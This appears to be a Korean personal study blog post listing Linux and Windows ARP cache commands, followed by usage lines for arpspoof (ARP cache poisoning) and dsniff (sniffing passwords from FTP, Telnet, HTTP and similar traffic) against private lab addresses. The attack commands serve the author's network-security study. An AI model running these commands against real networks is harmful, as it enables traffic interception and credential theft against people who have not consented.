일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | ||||||
2 | 3 | 4 | 5 | 6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 |
- scroll
- activity
- 계측
- appbar
- Flutter
- CustomScrollView
- TEST
- LifeCycle
- data
- livedata
- textfield
- Navigation
- Button
- drift
- Coroutines
- viewmodel
- android
- Kotlin
- textview
- Dialog
- tabbar
- 테스트
- 안드로이드
- ScrollView
- intent
- binding
- Compose
- 앱
- DART
- 앱바
- Today
- Total
Study Record
[네트워크 해킹] ARP 관련 명령어 본문
arp cache table 관련 명령어
1. linux 명령어
# arp -s : IP번호의 MAC주소를 arp cache table에 정적으로 등록한다.
- 동적으로 생성된 것과 IP가 같다면 정적으로 등록한 것이 우선시 된다.
# arp -a : arp cache table 확인
# arp -d : IP 번호와 관련된 MAC 주소를 삭제한다.
# arp -an : 해석된 이름을 보여주지 않고 arp cache table 내용을 보여준다.
2. window 명령어
c:\> arp -d : arp cache table 전체 내용 지움
c:\> arp -a : arp cache table 내용 확인
c:\> netsh interface show interface : 네트워크 인터페이스 이름 보기
c:\> netsh interface ip add neighbors <인터페이스> : arp cache table 에 정적으로 등록한다.
c:\> netsh interface ip delete neighbors <인터페이스> : arp cache table 에 IP 매칭된 MAC 주소를 삭제한다.
netsh interface ip add neighbors "로컬 영역 연결" "192.168.20.200" "00-0c-29-d1-cc-22"
netsh interface ip delete neighbors "로컬 영역 연결" "192.168.20.200"
arpspoofing , dnsff 명령어
☞ arpspoofing CMD
# arpspoof -i -t <공격 대상 IP> <변조할 IP>
arpspoof -i eth1 -t 192.168.20.200 192.168.20.201 : 192.168.20.200(공격 대상 시스템)의 192.168.20.201에 대한 MAC 주소를 공격자의 MAC주소로 바꾼다.
☞ dsnff 명령어
- arpspoofing이 되고 있어야 한다.
- 패스워드 스니퍼로 주로 FTP, Telnet, SMTP, HTTP, POP 등을 지원한다.
# dsniff -i -t > host
dsniff -i eth1 -t 23/tcp=telnet host 192.168.20.200 : 192.168.20.200:23 과 관련된 정보들을 보여준다.
'네트워크 해킹' 카테고리의 다른 글
[네트워크 해킹] DNS Spoofing (0) | 2021.11.09 |
---|---|
[네트워크 해킹] hping3 (0) | 2021.11.08 |
[네트워크 해킹] IP 우회 (0) | 2021.11.08 |
[네트워크 해킹] ARP Spoofing Attack ( ARP Cache Poisoning Attack ) (0) | 2021.11.07 |
네트워크 해킹 및 보안 - DHCP - 수정 필요 (0) | 2021.10.28 |